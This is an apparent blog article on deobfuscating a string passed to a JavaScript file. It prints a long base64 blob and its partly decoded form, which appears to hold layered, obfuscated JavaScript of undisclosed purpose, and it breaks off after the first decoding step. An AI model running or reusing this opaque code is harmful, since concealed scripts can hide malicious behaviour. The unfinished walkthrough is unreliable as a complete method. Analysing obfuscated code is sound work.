A little while ago, I came across an obfuscated string which I knew was an input to a JS file. I did not know the deobfuscation algorithm, the JS file or information on what the string could represent. Essentially, all I had was the obfuscated string. In this article, I describe my method for deobfuscating the said string.
Obfuscated String
IksyaVoxYm1OMGFXOXVLQ2w3Wm5WdVkzUnBiMjRnVnloWEtYdG1iM0lvZG1GeUlHVTlNemd4TURrNU55eFFQVmN1YkdWdVozUm9MR1k5VzEwc2JqMHdPMjQ4VUR0dUt5c3BabHR1WFQxWExtTm9ZWEpCZENodUtUdG1iM0lvZG1GeUlHNDlNRHR1UEZBN2Jpc3JLWHQyWVhJZ2NqMWxLaWh1S3pNd05Ta3JaU1UwT0RZek9DeDBQV1VxS0c0ck1UVTRLU3RsSlRNeE56VTNMR2s5Y2lWUUxHbzlkQ1ZRTEY4OVpsdHBYVHRtVzJsZFBXWmJhbDBzWmx0cVhUMWZMR1U5S0hJcmRDa2xOamN3TVRVek1YMXlaWFIxY200Z1ppNXFiMmx1S0NJaUtYMTJZWElnWlQxWEtDSmpiMk52ZDNKbVkzUm5hblZ5Ym5oNWNIVm9aR1YwYkhKaWRtdHZjM050ZW01MFlYRnBJaWt1YzNWaWMzUnlLREFzTVRFcExGQTlWMXRsWFR0UUtDSWlMRkFvSWlJc1Z5Z25ZV2RvSUNBOUxqWTlhVGt5TVc0OWJ5Z3VaMTExYkN0dlhYSnZkMk5rYVRodmNqdDBjMk5oWlhaZGFXMDNiblZiY2lrNE95aHpZVjF5SUZzOVlteDBaQ3h1YmpCYmRtMHVaRGRwWVNodVlYWXNMREFvTEhKMmRTaHljamdwTEdrMUxHNTJPeWxwWnlCbExHMG9iMnhzTEhZd2RDZzdMSFF3Y0dOc1lVRmhLRzVvTEdsbWFGdG5ZM0ppTjNZdUxHNWxiSGhEYkc5NmJ6MW5iMXM3YVRsMFd5RnljRnNyUFhNOWRqc3dQVEVyWVQxaFBXZHpaVDF2TEhJMFhXOWRJWGh6T3lrZ1l5SXBhbHRuZEdWeWNudGhaRzlrWVdGeWJpdHRhR2hpWWk1cGNEY2dkRUU1YmlJdEtYY29jbkpoY25KaFBYUmliWFZEZEQxcFlUWXVMaWxqS1NsMWNpdGhNU0ptTURzN1ozSnlQbVZoZGoxMFF6dHJLMm90YURzeFpDQnFaM0IwTFdnb2FHaGtJRDFsZER0c1pUMTJiSEpUWWpFcFEzSnZPM1poTENCbmJTdHpLRDB5UFgxeWIxdHVLanRvY3p0bGJDMDdQU0IyWmloa1l6WnVhVHNySUhKN2FuSlRiREZ1Y25ObmN6dGhPMjVqYXl0eWFuUmxaek55YmowaUxsdHhZV3dnYjNVZ01HTXljbWs3YlRBOVBURW9aVjFoWmwwZ2NpdGpPM1JoZXl0dkxXTnVNelFyT3lCb1ltUkJkaTVoWlQxaWJtOW1kQzU3S0NBeFozTTdLVHNwYkRGcGFpMDVkSGN3TjJabWRtRXBOV3hoZlRzb2JtWjlZU0puZEdnM2RTc3lMREp4UFRzOWRteDJaWFE3V3loME95bGlMbUlvSUNBN2RUbHFjSFk0TUR0Mk1qYzdhWEkyY0N4eWRXa2diamM0TEdkalBYdGplVGtzY0hCbE9EMHBiR1k3UEQxME8yZDFOR2R6UFNzeE96WWlLRHNzT0NrMmMzSjlkblZsS3oxaWRXTTNkQ2d1WW5ON2J6MWRLU2xvYXk1RGNqczdPM0poYUR3cGFUWXNQV2R5SzMxaklGMDVLQzRvYVc0OWJDc2dLR2hoWkdGbU1YQm9MbWwxYzEwMlppNXpjanRxZEd0cExEMWtLeWtvTUhKaWNDNWRZeXR2TW1OdWJ5STdQQ3BuS1hJMktUaHljMnh6S0RBN2VGMDlkalJ5UFRWMVlTbHZRMmx2S1dWdmREdHZZWEpsWVQwdVBTbHlLRFoxS0gxbFBXRXNaM0p3ZEhJOFd5Z3piajFwYUNKNktYWjJQVnRiZG13b08zSXBjRzltYW1weExDSXlkVU51YkNoaGF5c3BhWDB1ZEhKRGRuWnNJR1k5TGk1N0xYVW9JQ2x6Tkc0cGJ6SXJhUzVkZG5jdUxtVnVZanM3Ym5ONkxHTXNPMk51SUNoMUtUNHJjaXQ0Tml3cmRTSnliaWxsSUNobWJtSm9kR2M4S0d0dWNXNWxLU2xoYmp0eUxDNTBjbVUzZDI5dWNHd3JiV1YwTVNoQkxFRXVaVFoxYkd3NExtRW5LU2tvVnlnbk5HWlhabTh4SVZkc1pHVjBVU1E3Y0dKdUpDUXBLU2xtYkRBaFUxZDFWMlZsWmtOcFkxaGZaanM3YjE5Vk5EMHlYMWRtWFdGWFp5Z3VLREU3T2oxMVoxOW9LV1VnS0NSemZUczBmVEpYSlZjdVYxZDlJbUowSVZkWFZ6UjVXMUJYWHp0eVhYRTZOV1ZsZkZkcFYyNWNKMWR5V25ReU1ETjNYUzRnV1NWT0lHSXBlVmNrTGlRMktGZDdmV1JsYkc5WFhWQmliMWRxZXp0RFZ5QW9aaTVkTENKZktDNW1iM2x3S0hWWE1EWjFWMnBYZldabGIycFhkQ0ZYYW1OaVYycFFiaUV1TGlNZ2RGZzJYWE1nYWlGc2ZTQm1ZajAyWFZkc1pXVXNLVmNvS1dWREtWZFhLR1JYY204Z1VGOXlLVHB2WTFCeWQxUlFJVGhkTlR4WFYzSlhJQ2twWVgxZlpXTmxiaVJYT1ZkamRHVXBNellzTkM0d09XeDlWMkZsZFc5d01HSXBLSHQ3TEdNcFYxZHlhaTR1WVhwbFpUY3VSV3A5VjJSWE8xUlhlRkJYYmw4M1pTbG5hbW80WlZjb1pYMGpkWDFUVjE5b01TNDZZaWxQVjNBa0tEVXNWeWxmWFNCWFVHVTlkU2xsWlNCME1HUjBMbU1vVjFBb1Yyd3FhU1JuVjJZb0t6QmZkelZYT1dkWFVGYzlkRGN6TEhVa1YyVnVaaVJ6WHloWFpWOW1QU0FoWHlVeFVEQmlOVmR2VnloU1ZEMGhhVDF1S1drcE9UVXBVRmRYY1NrM1UzMWRWMlZiUFZNNVZ5VWdMbWRYZURBdWZYSjdWMGhYVnpWdVZ6WjBMbE1zTVdWdloxdG1ObFFvWkNra0xDQlhjbGRsTGw1Yk9UWjdjakVrZWowc0pIUXpWeTh3TkZneVYyVmRQMlVvWldsUU1GZFhMbUZ1S1VRdVgxZDNRMU5PZTJKWFYycFhYM1I3TmowMmRHNWZWMjRvZEhBMWZYMXVKVHNzSURRZ0pDNHdXMlU1S0haMEwydGtMeUJwWjFCalppNXFZMTlsVjFBeWJWQnFZbVloVjJweklEMVhaV1pmTmprdUxEazdaR0ZwS3lsN0tWZFFWMjh6S0c0cE5TNWlmVmNsWkZjcGJpeFFORFFwYVhKM2FsZENablUwTlZjdUx6QmxaV1JYS1d4dVVtazdjRmR2WFRVdFYyTm1YQ2RRUm4wd1Z5Rm1VM013VnlrbGFDaG1WM1ZOSzIxbE1pa29WMlV2VnlBZ0tIVWlZbXBmWHlVa2ExOVFNRU51SlRBb1ptVTlWMUZqZERKdk1tZHZLR1ZRTW13eElGZDliaUYxWm00N2JsMVhOM2RpZTJrNFBWOG9WelU0TjNZbFhTRlhYMUJ4ZTFjeExpbDFKRmNzVzJSbUxYVnRaVjlYZEZjb0tHWXFYVmNsU2lWdlYycHpZWEpES0RobFpteGRaWDFKUkhRdVZ6MWlLVVJYZWxkWFgzRlhJemtnSTNCdGFpVnVjM0E3Ym5WY1hHeGRWeTQ5Vnk0N05qMVhmUzU3SlY4L2NDMVhabTQvYkZjZ2JXOXFWMmtvT1NGWGZTSnNabm8wTG5CWExuSXFZbVZmYkY4dUxtRWdXMUJFSVh0UVZ5bGZibVZ4VURkUVZ5WWtVRUo3YURNN2IxZGhWMWQ3YVc0ekkyb3JWeVYxSkhSMUlrTjVMSEJxYjN0WE96QnBaU1ZmTVNwWElURXlha0lwTUdreFpWOHlWekpGYmpCd0tXUjlPeWxzYVZkcUxqQWdhbjBzVTI5aExGNHVYMTA3VUZkcUlqQXBMakk1TzFCdlYxZG1LUzVYS0R0N1NpaDNiakpRVmxjb0xsQlhJRmQzTlYwNWRGMTlWMjlkWFN4eVZ6RjBhVjluWDE5WFBUMVhhUzVRVUdsWFYyTlFaaWtvVnlrMVZ6VW9MelV3SmxkTmZEZHlLV3N4ZXl4UWMxMXVYeWtzVUY5M1hWOWxkRmRYWlM0b2FWQWhLUzVrVjJJNFptOVhhblZYVjFkUUl6ZG1VRFZYWFZjM0tDRXdiekJjWEZkNU1pQjRNWHRGTVRFaExtVmhNQ2hoTVZ3bmNsdG5PeXhYVnkxdGJXa21VRkJRV1Y5cWFIMWZZamhuT1ZkWGNpeDNWMWQ3WjJaeU9YUWtZVjh5S1VWcFVYVlhLRFJ1TVdwblhXa3NKU05jWEh0cVlUZFhXMWNtZEZjL2V5NDJJU0ZRVUdWWFpDbFlNU0JsT0MxMllWQm1MRmNySWlsMFpXZDdmVzRsTEN0eUpHRmRNajh6WmlrN2QzVWxWMjVYTVc5OVpTaHZNU0pYS1hWWEtHeHViV1ZxS1Nrc2FtOWZPRElrTERWcWRFMVFleVFwVnpsMGFtNDljMkU3WVNFcEtGY3pkMlVsZFhCOWZHVnNYemhkZTNwbFVHcFFVeU11S0dkY0oyVlhPMkVsZGswd1lWZHZNRFYwZDJSZE5GZFhWM0pYSUROWGRDQmtMRzh1SkdsUU5FbFhZM1Y3VjFkWFVDazVWek1vVjNSSE4xY29ibmRxWldndVZ5NXBmU0JYS0d3OVptOHdlMjRzWVM1WEtXWW1aVEZxYjJZbGRGQmhaQ3hYYzFkMk8yNWZibGRKTGlCMVVHcHZiR3BxVUZVa2VuSTBNbGRwWm1WOFhWY2tmWFJYYWlWZFYxQWxaQ2xYTUZkWFYyUWxQbVZxSUdrcGRIcE9jeUp5YVhvM1VGYzNNbkl5Y21KTFJTZzRkQzAyTlRaT1Z6Y3FYV05zTDJZbExHWXBiRHR6UEYxbWNDMVhWMjVkWVZjeU9TNG9WMjVYVW1wZFhTbG5JRFk5WnloaFpWOXBkRTFYTEdsMWFuVlhkMlpRZXpOWFYyWlhWeXd5ZVhjcE8ySXhMRmN2TVdNbElDQmhVQ0F1WWxBelkydGpNSFZtTGpOc1YyVlhlVmRkZFdkWFYyNWlJQ2xYVjI1dVhYTmpOMWR0TG1Fclh5Z2lMbXB0VG1Nb1psdHBMbVZkWDNVdWJtVXNYMlVwZEZkalZTa3NaVmRkUmlCWFZ5Z3VlVEZYSUdsZFYxY2xWM3BkVjNWZE1GMDROaTVxVURBck9TeGxZMlV4TGk1ekxsY3NKR2xqVjJWd09Ed3pKRjlpTGlVck1qVmZYV1ZxZEhsYk4yRWdLVFl1Wm1wOUpIMWhmVmRYS0d4WE5rUXhZVzlsVnlRcFRTSTFPMnBYTkdvdWFWd25LR3dvUmxZMk0xQlFWelZYSlhVcE55QmxVQ0FnTGk0cGNYdDlkRTRwY3lnN1pTWWxaREE0YkV0cVd5NDVMalFtVnlGbVYyVThaaUJ4YkRacFpsQmhVRFZpZTMxMlVEVnlaeTFzSkM0Z1JtVm1WMU5YYW5CbFkxZEZSV1VsSkh3cFRtWlhPMkZsYm05ZlhTUlFjbTRzWm5vcGFWOXFYVmRxTGlRZ09EbHlMaVZmVnlKb01XbFFhU1E3YmlreFVGZFhmREVpVnlZbExqSnFjRGRNWlhRelZ6VmtaR0VtZFM0eGVueDVaRmQzV21wWFZ5bFhLR1o0SUd4d0xtRnJiVGxsTmw5cVBTNHViaVU3SWlodmQySmxWRkJ2Y2xBcE0xTlhSV1lwZTFkWGJWMHRWMWRYVjN4QkkyZHljaWg5Skd4WEptSWxaRmRxTzJOZ1Z5cFhhaTVpUVdnd2NEMVhJREJRUVdwbEtYSlVTVmRsYlNobWRYY29YUzVRWmwwa1YybHdNemtwTTF3blZ6QXVWMlp2VnlWaWNDeGxJU0ZLVjExM1ptWnNjbWtwVnl0cFYzSlhPMTlYYmxjcE96QlhlbVV4S0NJN1l5NVdLRE43Vnl4MUlEaFFhbUUzZVM1WFFtNVhibGRkS0c1dGNubzBWeWtyT0dabU5sODJPMms5TzNRdVkwVXdJV3RsZlNsZlh5aGRjR0Z2VjJWMWRHNWRWeWt3YWxkWElHb3NYV3MyYVR0N1lsZE5NUzVkTG1OZll5UlhReWhJYjI5YVgxQmZNMEI3VUNnN0tTNU9abGMyVjNWN0sybG1ZMWN1TjFjelYzQmZWbWx3TG0xUVgyWTJKV1FxSVhRcElGY3NYMnBqZGp0WFVGY2tZV0V1WmxSWFgxY3VaV1YyZTMxcUpISWxVR29qYjNwUWZXNVhMaVpmVG5jd0lIQnZMbmRmYVZjN2FsY2pOVjlRTG1aWFgzUjlhamxoYmlJb2RUVjdaV3hUZUZveFFHZDBNVjl1TmxjN05GZGpWQ0ExSlZjc0pTa2dJR1lnTkhabExDbHBYMTB1V3lZb1gxYzdaWDFYYWxkUUtGZG5LQ01wWmxkN05XVmJJVHNnZTBRdWIxUjRLbmgxWVRraUtWQWdWMWRYTlM1WFpsY2tOVFpkUDI5bFBXZFhjMzBvY0gxaEtYTjdYMjVqTjFCWGREQlhkM0pYVjJVeklIUTBMbWNzSUVGeWFWZG1aU29oZEcweFVDaHNkR043UFdadVoybGhaU1U5SURVbFd6MThiemcyTG00bWR5ZzNiU2tvUFRaYlZ5MTdhU2x1VUhSWFptb3lKVmMzYzFkbFgyOXBiazAyVjFkbU1YbG1JbDg1VjFkUWNtNWpkM05oSlZjb08xaFFLQ0JITENsME5XNHBjRmN4TXpSWFhYRmZPR3dwS1hzMmNISXVVR2wzYVcxd2UxY3BkR29wTVNoZGRDcHNYekVsTER0eExEQnlabDlxVjI5WEtTbG1lek5kWHlsUWRDaG1hbXhjSnlGWGF6VTdMeVZuY1RKWFp6TXBaU2c0VjFOWGVXcFhURjVmTkdOWE9HbFhJWHRZVzFkdWVXZ3BRMm9zYVdrdExuSTdZaVVySldOYVYzUTFJUzR4S0Nsa0tUaG9WMTh6YVhScElDNGdhbVlzVUZkWFZsZHFJaUF1YVM0cFZDTTJaWHN3YWlGdktHVjNjM1EyVjFkY0p5VjBMaWgxS0NReE4wUmlialEyY2lneWRFMWRVRFlvVnpOak0ya3VjbGRWZEZkUUtXbGRMMjhvTkZkWElpMUtJenRYZWlnN1YxQTBYejFYVjJaWGRGVjBSU3dsZVdwbWJTRXRJSElsVnowd0lrbHlaaXRuTVRkdFVGY2lLU0ozYVNoMElHVnlWanRkY2k1cVpESmtaU3dsTUZCdllpbHBZaWxRYlZjN2NuQmpiWDFYWHpGWFhWZHFZalpRVnpKek9HVjdWekF5YVdwWEtEUmxkRmMxVnp0amRHNWRYVmNtT0ZjMFppdzdiV0Z0ZEdVMmNEMVhXMWM1UzJWWktXa3hLRHRYYmwwbE5EUnFaVGhsSUdaZGFTRnZkeXhkZEZkc2RDaFhkR2xRTzJZcFYxODljeWxYTEgxOWFXeDdVSEJRSkhSbGNWZDdMbWtwTDNCcVgzVjVQV0kxVnlGWFYyVjFkVWNnZGlsMGJFNXlMa1ZpTlZjemRXZFhZbDhvVERaUUxDNXhKU2xYWVhSYWJtVlhZVmRsZTNCeUpIRTBJbmRpWFdVdWN6WjNVR2t1TUdKdmR5Vk1jMTl6Ympzd05YTWlYMTEzTGlraGRHWXVLSGRkVTJnaFl6QmhOenN1TjFzb2VpQXBJVzVYWENkdEtTQWtibGRYZENrcGNDVlROeVV1TUh3dVNXNTBleTVtS1ZsWE1sOXNabDBvVnlCMGRYSnlJRmRwZEhKWGRIYzFPR0Z6VUZ0bFNpRXdKSHBsVjFjc2JETTNQbGRYZldaZGFTaDBOU3RrY3pOWE8zSmZWelVvUFdwbUpsZDJOV2twTXlobFYzSXNjRjhqS1ROWFptRXhUVmRsSW5zaFlXUmhQQ1YxUDI1WEpXRXVQWFJwTG01bUtDNDRibVZtTzJSZEptVjFQbEF1Y21sa015RXRVR0Z0S1hNN2MwUmJVQzRvVnpzelhXcHBOU0JQZEhKdU1DRmxaMlZqZFNsWGRHVWpKV1Z1WnloNFlYVTBKV0prVjEwcFkxQlhlMjV6Ym1wcmFDbHFaV05tS1hSbFppeGxibWRxYml4aUpWc29hV055TjNNamFUSTJOR1FnYVNreFYzb3hSV0V4ZERaYmQzSjlMbXB5VjExWGIyWndjMjkwWkNodWIyd2pJU0FwTWtWelNHZ29iMTA5YzJWN1FHSTFaWFJYWW5OZmVucHdMaWc3SUdWS1YxOWRZakJjSjJra2FtWmhMR1V1ZFdaU2RDVTVWeUJRYkhnN1hXOVhYVkJ1ZENBa1lTQTBMbGR6T0h0aFpISkRLRFJEWDJGaFVDSndQVEJtSkZjeUpGZFFWek1zTWxFd0pGQjlVRmRYS0NWeVVHZDJMbXRUS1M0b1YybHZiMTAyYW1vN1VDRmhJMUFwZlRodVBWMWxjalpoWnpKUWFpNDlKR1ZsTGk1bFpsY3hQMTloTXpFcExtcG1ZWDFsTGw4emZTNVhYelpkT0M1aktEVndNU1pwS1Z0MFVDbGJWMWQ1ZHlrc01DQndkMjloTm01a00xZGRPU2tnUFYweFYyQmxYeVJYYW1VaVZ5UW9JbVZ1SUc5QVlXVlhZbmR6WlZkOU5WZHVPRmNyWlc0aUtHVWxNQ1ZpWlRVcFowQWxaV1pqSVQxMFlYWm1aanRYYVZOc2Jpa2xLR1VwZDNJdVZ5azFJVmN5TUdveFlWY3BVQ1U5WTFCNExtMVFYVEVvS1VwUVhYSTRLU3AxWFN4d2NUY2tWelF3VnlndlpUZHJPbkk5S0YxdVUyNVhYVGd6WFNrN2ZITjBPeUVoZDFkME9DaG1kMmx6Wmx4Y1hUQlhLVE51WDNOMmFWMXVkVGhRTG1KeWNpNWROeTRwVUZBdWNuWndWMlZYWkdjNExDaG5MR2syTzFkN1lXSTFKU2h6WFQwb2ZTaHBkV0YxWXk0OVYxNDROWFlvWVNobktWY2pYMkl1VnpkbVl6WXVhbWtzWFc0a0lTZ3BWaUZYS1VWcU5tTnRiVzVYYmpJd0tGQlhhU1ZtWUQ5ZmRTbGZWek5sT1RBa1YxMWlLVkJxY3pJMVJWZGxQVzkwVURSbE0yYzdkU1VsZUhNM1YySlBObEJYZTJJemJpbGpNaTVYSUYxek1WQlFWeWc4VnlRNU16QThha2c5VjNjaVYzSjBaaWxYVGlCZFYyVTJJekE1WXpCRVBGMGdWeVl4WkdZeFVDQnBmR2tvZXlsWEl6azRWelJkWDEwdFYyOXZYVjBwYmpGdlJXb29JRkJYWHlnMUlpVmhNRDFGT3k0L2JIWXdJakJwZXpaUU1DNTNYU1F3SVZkWExWY3VLVmRRVnl0bmJpd3plRmNzVjJaa0xqMTdJR1ZYTG01eWJYMHhMbGRmWVZkWFhTaHNOaWxYZDFjemFuSndJRGcxYkZkcFYxOHNKaXhxYlRRMUtERXVYQ2RoVjFVME1DaHNiMTluS1d3ME9DbGRYM1F1VnlraFYxZEZSU0JRWmtsWEszdHhabk55WkZOWE1GZHVUaVF6Zlc5WEtWZGthbVpkTWl0bFpUWlhWeWt0S0dWWGJIUWdWMWRiTG1rMmJsZHVWeTVwS0dVNUtGY21iRmRkVjJGWE9UZ3NJMWR1S0dZOU5ESWxPVk5jSjJWclpUZE9LVjltVURjN2FpZ3dVR2xrVjNSbFZ6VnZLRjBwWkRKZE5YazliRWtvSVZjN2VTQXVVSFU3ZXpOZGIyWnVLRE1rZlRobU4zQnphbVpzTG00dGUyb3NVMjhrVUdWdGFYMVhWMXduS1dVMEtGTm1Wekk0Tm1ZZ0pUQmxjR01wWm1SeWNXbHZZWEVvTGw5MVgyTlhYM2x2TGxkd2FUWlhMbGRkS1Nrd2RTMVhiSGdzS1ZBbUtTNXFLV05kYzJVb2FEWXVleTVYUkZ4Y1lURmROMlowWlR0elUxZFFJRmNvTW1JdUpHVWtJM0l6TENod0lIdG1LUzR4WFY5eEpWOWthVEUyT0doWFpTNWhlSDFtZDMxbFYyOXFkeWxYVTJ3d2RISlhjeUJzZlNWbWNHSm9ielVvTTN0dlhVTXlManM3YTFkaGVWZG1TVTV0YVhRdWNGZGpMbEFvYjJWUVgyRTFZeTVYWDJCcEt5WTlWMjh1Y25KcGMxZDdVRHBYSlNCVFpuMWxMbTFzYkRaWFYxODFVSFEyYVQxWGJsY3VJR1U3VjJsWFZ5QW9leUEwVnlNdVhXWlhLR1pkYkc4eWFsYzdNMUF0S1gxMExsNTFLR01nVTFkbllTNWxMbGQ5S1RWa1YzUlhJU2hRTUdJcE5YQkVUaWxzVjNsd2RXRmpJVFpYS1NrdVVHSTNhakZ2Wm1saVlrZHNZVmRyTTFCek1TQmhMRFFwWWpSeWFtUlhVMlZ0SlNsd2Vta21LVzgwWm1VN0xtNVhmU2tqZlhobktIUjdjQ1JMYmxkaWVqTkpJamxYVUN3MlcwNW1YMlpuVUNrd08wTm9VRmRYVUdvbVppNXVMbUptZWoxZFVDTmZYemQ3WENkWFZ6RnpmU1ZkWHlCWEtVazlJVGcyT0ZkOWJEQnFWMTFmWlZkaWVGZGRZMlJmVUZkWFYyRXBabWNrVUc0N1BXSmRWMTh3UFYxWGVpQWdWM1JYWldJa2JWQnVibVZ4VjE5d1gyZDVOekZkVnpNZ2ZGY29aaVZ6TlNsMElWZGtiU1l1Y25GMFYzSWdNeTlkU1dOVFoxOVhka1o5VUU0K0lGdGlOV3BsYWlSWGRtWnFkelV0VUd3Z1YxZDBWMTBnVnpOZmNtWmZWejAwTTExZFhWZGxOeUVvY1YxcVYzMXdhU2dwZENndVYxMVhkMUJYYkZkNVYydzJQUzVRVnk0Z1hXY3dJUzVYWVc1MFYyTnNhVFZxTFZ0OGJIZDdaVGMxTzJkdlYxOVFkRmNwWWpRMllWY3lWMlppWmlCbGVXWmRiU1JYWmlCb1YxMXFNbVY5Vnl3cExHZFhLSEJqWVdvMVVDdHdibGMxTlZBcGNDQXVjR0p0WnpGdmNta3VOaVJkTkRkWFZ5bDNlQzVUTXk1bVkyMG9MbXB5VUdvNE5WY2dXeWw4WlZ0cFZ6UnZZWG9wY2laWGJGQmxJRUY3VjJFdWJXNVhJRzlYS0Zkd2ZYVm1aU2xYTGxkZlYzSWxQVzhoTjMxWGFtaHJJU2hxSURseWFURXpLelp3Wlc4b09WODJkR2RYVjI1NGUyNTlYV3dvVnpjb0pUWTNZbDhpWDE5ZE5UTjlPRHNoSUNseUttNTJNVmNtY0hSd2F5bEpaQ2xsT0NodWRWZEpNRmM5ZldaMExqZDBMbXhtS1RaWFZ6VnJZMUFuS1NrcEtETTFPVGNwZlNncE93PT0i
Deobfuscation
base64
Decoding
The character set used in the obfuscated string suggested that it might be base64
encoded. On base64
decoding, I got the following string:
"K2iZ1bmN0aW9uKCl7ZnVuY3Rpb24gVyhXKXtmb3IodmFyIGU9MzgxMDk5NyxQPVcubGVuZ3RoLGY9W10sbj0wO248UDtuKyspZltuXT1XLmNoYXJBdChuKTtmb3IodmFyIG49MDtuPFA7bisrKXt2YXIgcj1lKihuKzMwNSkrZSU0ODYzOCx0PWUqKG4rMTU4KStlJTMxNzU3LGk9ciVQLGo9dCVQLF89ZltpXTtmW2ldPWZbal0sZltqXT1fLGU9KHIrdCklNjcwMTUzMX1yZXR1cm4gZi5qb2luKCIiKX12YXIgZT1XKCJjb2Nvd3JmY3RnanVybnh5cHVoZGV0bHJidmtvc3Ntem50YXFpIikuc3Vic3RyKDAsMTEpLFA9V1tlXTtQKCIiLFAoIiIsVygnYWdoICA9LjY9aTkyMW49byguZ111bCtvXXJvd2NkaThvcjt0c2NhZXZdaW03bnVbcik4OyhzYV1yIFs9Ymx0ZCxubjBbdm0uZDdpYShuYXYsLDAoLHJ2dShycjgpLGk1LG52OylpZyBlLG0ob2xsLHYwdCg7LHQwcGNsYUFhKG5oLGlmaFtnY3JiN3YuLG5lbHhDbG96bz1nb1s7aTl0WyFycFsrPXM9djswPTErYT1hPWdzZT1vLHI0XW9dIXhzOykgYyIpaltndGVycnthZG9kYWFybittaGhiYi5pcDcgdEE5biItKXcocnJhcnJhPXRibXVDdD1pYTYuLiljKSl1cithMSJmMDs7Z3JyPmVhdj10QztrK2otaDsxZCBqZ3B0LWgoaGhkID1ldDtsZT12bHJTYjEpQ3JvO3ZhLCBnbStzKD0yPX1yb1tuKjtocztlbC07PSB2ZihkYzZuaTsrIHJ7anJTbDFucnNnczthO25jaytyanRlZzNybj0iLltxYWwgb3UgMGMycmk7bTA9PTEoZV1hZl0gcitjO3RheytvLWNuMzQrOyBoYmRBdi5hZT1ibm9mdC57KCAxZ3M7KTspbDFpai05dHcwN2ZmdmEpNWxhfTsobmZ9YSJndGg3dSsyLDJxPTs9dmx2ZXQ7Wyh0OyliLmIoICA7dTlqcHY4MDt2Mjc7aXI2cCxydWkgbjc4LGdjPXtjeTkscHBlOD0pbGY7PD10O2d1NGdzPSsxOzYiKDssOCk2c3J9dnVlKz1idWM3dCguYnN7bz1dKSloay5Dcjs7O3JhaDwpaTYsPWdyK31jIF05KC4oaW49bCsgKGhhZGFmMXBoLml1c102Zi5zcjtqdGtpLD1kKykoMHJicC5dYytvMmNubyI7PCpnKXI2KThyc2xzKDA7eF09djRyPTV1YSlvQ2lvKWVvdDtvYXJlYT0uPSlyKDZ1KH1lPWEsZ3JwdHI8Wygzbj1paCJ6KXZ2PVtbdmwoO3IpcG9mampxLCIydUNubChhayspaX0udHJDdnZsIGY9Li57LXUoIClzNG4pbzIraS5ddncuLmVuYjs7bnN6LGMsO2NuICh1KT4rcit4NiwrdSJybillIChmbmJodGc8KGtucW5lKSlhbjtyLC50cmU3d29ucGwrbWV0MShBLEEuZTZ1bGw4LmEnKSkoVygnNGZXZm8xIVdsZGV0USQ7cGJuJCQpKSlmbDAhU1d1V2VlZkNpY1hfZjs7b19VND0yX1dmXWFXZyguKDE7Oj11Z19oKWUgKCRzfTs0fTJXJVcuV1d9ImJ0IVdXVzR5W1BXXztyXXE6NWVlfFdpV25cJ1dyWnQyMDN3XS4gWSVOIGIpeVckLiQ2KFd7fWRlbG9XXVBib1dqeztDVyAoZi5dLCJfKC5mb3lwKHVXMDZ1V2pXfWZlb2pXdCFXamNiV2pQbiEuLiMgdFg2XXMgaiFsfSBmYj02XVdsZWUsKVcoKWVDKVdXKGRXcm8gUF9yKTpvY1Byd1RQIThdNTxXV3JXICkpYX1fZWNlbiRXOVdjdGUpMzYsNC4wOWx9V2FldW9wMGIpKHt7LGMpV1dyai4uYXplZTcuRWp9V2RXO1RXeFBXbl83ZSlnamo4ZVcoZX0jdX1TV19oMS46YilPV3AkKDUsVylfXSBXUGU9dSllZSB0MGR0LmMoV1AoV2wqaSRnV2YoKzBfdzVXOWdXUFc9dDczLHUkV2VuZiRzXyhXZV9mPSAhXyUxUDBiNVdvVyhSVD0haT1uKWkpOTUpUFdXcSk3U31dV2VbPVM5VyUgLmdXeDAufXJ7V0hXVzVuVzZ0LlMsMWVvZ1tmNlQoZCkkLCBXcldlLl5bOTZ7cjEkej0sJHQzVy8wNFgyV2VdP2UoZWlQMFdXLmFuKUQuX1d3Q1NOe2JXV2pXX3R7Nj02dG5fV24odHA1fX1uJTssIDQgJC4wW2U5KHZ0L2tkLyBpZ1BjZi5qY19lV1AybVBqYmYhV2pzID1XZWZfNjkuLDk7ZGFpKyl7KVdQV28zKG4pNS5ifVclZFcpbixQNDQpaXJ3aldCZnU0NVcuLzBlZWRXKWxuUmk7cFdvXTUtV2NmXCdQRn0wVyFmU3MwVyklaChmV3VNK21lMikoV2UvVyAgKHUiYmpfXyUka19QMENuJTAoZmU9V1FjdDJvMmdvKGVQMmwxIFd9biF1Zm47bl1XN3die2k4PV8oVzU4N3YlXSFXX1Bxe1cxLil1JFcsW2RmLXVtZV9XdFcoKGYqXVclSiVvV2pzYXJDKDhlZmxdZX1JRHQuVz1iKURXeldXX3FXIzkgI3BtaiVuc3A7bnVcXGxdVy49Vy47Nj1XfS57JV8/cC1XZm4/bFcgbW9qV2koOSFXfSJsZno0LnBXLnIqYmVfbF8uLmEgW1BEIXtQVylfbmVxUDdQVyYkUEJ7aDM7b1dhV1d7aW4zI2orVyV1JHR1IkN5LHBqb3tXOzBpZSVfMSpXITEyakIpMGkxZV8yVzJFbjBwKWR9OylsaVdqLjAgan0sU29hLF4uX107UFdqIjApLjI5O1BvV1dmKS5XKDt7Sih3bjJQVlcoLlBXIFd3NV05dF19V29dXSxyVzF0aV9nX19XPT1XaS5QUGlXV2NQZikoVyk1VzUoLzUwJldNfDdyKWsxeyxQc11uXyksUF93XV9ldFdXZS4oaVAhKS5kV2I4Zm9XanVXV1dQIzdmUDVXXVc3KCEwbzBcXFd5MiB4MXtFMTEhLmVhMChhMVwncltnOyxXVy1tbWkmUFBQWV9qaH1fYjhnOVdXcix3V1d7Z2ZyOXQkYV8yKUVpUXVXKDRuMWpnXWksJSNcXHtqYTdXW1cmdFc/ey42ISFQUGVXZClYMSBlOC12YVBmLFcrIil0ZWd7fW4lLCtyJGFdMj8zZik7d3UlV25XMW99ZShvMSJXKXVXKGxubWVqKSksam9fODIkLDVqdE1QeyQpVzl0am49c2E7YSEpKFczd2UldXB9fGVsXzhde3plUGpQUyMuKGdcJ2VXO2Eldk0wYVdvMDV0d2RdNFdXV3JXIDNXdCBkLG8uJGlQNElXY3V7V1dXUCk5VzMoV3RHN1cobndqZWguVy5pfSBXKGw9Zm8we24sYS5XKWYmZTFqb2YldFBhZCxXc1d2O25fbldJLiB1UGpvbGpqUFUkenI0MldpZmV8XVckfXRXaiVdV1AlZClXMFdXV2QlPmVqIGkpdHpOcyJyaXo3UFc3MnIycmJLRSg4dC02NTZOVzcqXWNsL2YlLGYpbDtzPF1mcC1XV25dYVcyOS4oV25XUmpdXSlnIDY9ZyhhZV9pdE1XLGl1anVXd2ZQezNXV2ZXVywyeXcpO2IxLFcvMWMlICBhUCAuYlAzY2tjMHVmLjNsV2VXeVdddWdXV25iIClXV25uXXNjN1dtLmErXygiLmp